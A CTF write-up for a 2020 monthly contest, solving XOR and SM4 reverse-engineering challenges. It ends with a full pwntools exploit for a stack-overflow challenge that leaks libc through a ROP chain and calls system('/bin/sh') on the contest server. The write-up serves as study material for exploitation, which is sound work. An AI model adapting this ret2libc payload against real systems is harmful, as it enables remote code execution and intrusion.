0x02 - 2020 Anheng April Monthly CTF Writeup

    Re - Intro reverse

    • A freebie, the flag is right in your face
    # Each ciphertext byte was produced as (p ^ 6) + 1, so invert it: subtract 1, then xor with 6
    str1 = "akhb~chdaZrdaZudqduvdZvvv|"
    flag = ''
    for i in str1:
        flag += chr((ord(i) - 1) ^ 6)
    print(flag)
    
    • flag{daef_wef_reverse_sss}

    Re - encrypt3

    • Being lazy, I didn't analyze it carefully and just brute-forced the flag
    # Ciphertext bytes pulled from the binary
    enc1 = [38, 44, 33, 39, 59,
            35, 34, 115, 117, 114,
            113, 33, 36, 117, 118,
            119, 35, 120, 38, 114,
            117, 113, 38, 34, 113,
            114, 117, 114, 36, 112,
            115, 118, 121, 112, 35,
            37, 121, 61]
    
    # Single-byte XOR: try every key and keep the one that yields the flag prefix
    for i in range(128):
        flag = ''
        for j in enc1:
            flag += chr(j ^ i)
        if 'flag{' in flag:
            print(flag)
    
    • flag{cb3521ad567c8f251fb1252d03690ce9}
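    Both reverse challenges above are the same byte transform in disguise: every plaintext byte was shifted by a constant and XORed with a single-byte key (add -1 then xor 6 for the intro task, xor 64 alone for encrypt3). The block below is an added example, not code from the original post; it folds the two one-off scripts into one search over the (add, xor_key) pair. Since the transform works byte by byte, fixing `add` pins the XOR key from the first byte of the known `flag{` prefix, so only the additive constant needs enumerating; the rest of the prefix plus a printable check filters false positives. The function names `decode` and `recover` and the search range of -16..16 for the additive constant are my own choices; the two ciphertexts are the ones on this page.

```python
import string

# Constructed from the two challenges on this page: the "intro reverse" string and
# the "encrypt3" byte list, i.e. the original ciphertexts.
ENC_INTRO = b"akhb~chdaZrdaZudqduvdZvvv|"
ENC_ENCRYPT3 = bytes([38, 44, 33, 39, 59, 35, 34, 115, 117, 114, 113, 33, 36, 117, 118,
                      119, 35, 120, 38, 114, 117, 113, 38, 34, 113, 114, 117, 114, 36, 112,
                      115, 118, 121, 112, 35, 37, 121, 61])

# Printable ASCII without control whitespace; a flag candidate must consist only of these.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def decode(data, add, xor_key):
    """Invert the transform byte by byte: out = ((in + add) & 0xff) ^ xor_key.

    add=-1, xor_key=6 reproduces the intro challenge; add=0, xor_key=64 is encrypt3.
    """
    return bytes(((c + add) & 0xFF) ^ xor_key for c in data)


def recover(data, prefix=b"flag{", add_range=range(-16, 17)):
    """Find (add, xor_key) pairs that turn `data` into a printable string starting
    with `prefix`.

    For a per-byte transform the XOR key is determined by the first byte once `add`
    is chosen, so only the additive constant is enumerated (assumed range -16..16);
    the remaining prefix bytes and the printable check weed out false positives.
    Returns a list of (add, xor_key, plaintext) tuples.
    """
    hits = []
    for add in add_range:
        xor_key = ((data[0] + add) & 0xFF) ^ prefix[0]
        pt = decode(data, add, xor_key)
        if pt.startswith(prefix) and all(c in PRINTABLE for c in pt):
            hits.append((add, xor_key, pt.decode("ascii")))
    return hits


if __name__ == "__main__":
    for name, enc in (("intro reverse", ENC_INTRO), ("encrypt3", ENC_ENCRYPT3)):
        for add, xor_key, pt in recover(enc):
            print("%s: add=%d xor_key=0x%02x -> %s" % (name, add, xor_key, pt))
```

    Running it prints one hit per challenge, with the recovered parameters next to each flag, which is a quick way to confirm that the hand-derived transforms in the two scripts above are the only ones in range that produce a clean result.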

    Re - sm

    • I knew it was SM encryption and guessed SM4, but spent ages looking for a tool without finding one

      • Then I <del>fell asleep</del> went off to do other things
    • After the contest ended I saw that a fellow player had written a library for the decryption

    • From the program, guessed the key is 0x0123456789ABCDEFFEDCBA9876543210

      • The ciphertext is 0xC079776677E5AC9931C567EB470645A7
    • After installing the library, tried decrypting to get the flag

    import pysm4
    
    # 128-bit key and single ciphertext block, both as integers as pysm4 expects
    key = 0x0123456789ABCDEFFEDCBA9876543210
    cipher = 0xC079776677E5AC9931C567EB470645A7
    dec = pysm4.decrypt(cipher, key)
    # Print all 32 hex digits; avoids the trailing 'L' that Python 2's hex() adds to longs
    print('%032x' % dec)
    
    • flag{d0389046c236e4c66bd787959f5c6e66}

    Pwn - echo server

    • Simple stack overflow; the only thing to watch for is that the stack pointer has to be hijacked into the .bss segment
    from pwn import *
    from LibcSearcher import LibcSearcher
    #io = process('./test')
    io = remote('183.129.189.60', 10061)
    elf = ELF('./test')
    
    buf_len = 0x80
    # fake saved rbp pointing into .bss, so the stack pivots into writable memory at a known address
    fakeebp = p64(elf.bss() + 0x500)
    
    start_addr = 0x00000000004005C0    # _start: restart the program for a second round of input
    pop_rdi_addr = 0x0000000000400823  # pop rdi ; ret
    retn_addr = 0x0000000000400824     # ret (keeps the stack 16-byte aligned before calling system)
    
    # Round 1: leak printf's libc address by printing its GOT entry
    # (0x4006EE is the code address in the challenge binary, taken from the original script,
    # that prints the leaked pointer after 'hello ')
    payload = '\0' * buf_len + fakeebp + p64(pop_rdi_addr) + \
        p64(elf.got['printf']) + p64(0x4006EE) + p64(start_addr)
    io.sendline('2333')
    io.sendline(payload)
    io.recvuntil('hello ')
    
    # Pad the leaked 6-byte pointer to 8 bytes and resolve system / "/bin/sh" via the libc offsets
    printf_libc_addr = u64(io.recv().ljust(8, '\x00'))
    libc = LibcSearcher('printf', printf_libc_addr)
    system_libc_addr = printf_libc_addr - libc.dump('printf') + libc.dump('system')
    bin_sh_libc_addr = printf_libc_addr - libc.dump('printf') + libc.dump('str_bin_sh')
    # Round 2: ret2libc, system("/bin/sh")
    payload = '\0' * buf_len + fakeebp + p64(retn_addr) + p64(pop_rdi_addr) + p64(
        bin_sh_libc_addr) + p64(system_libc_addr) + p64(start_addr)
    
    io.sendline('2333')
    io.sendline(payload)
    io.interactive()
    
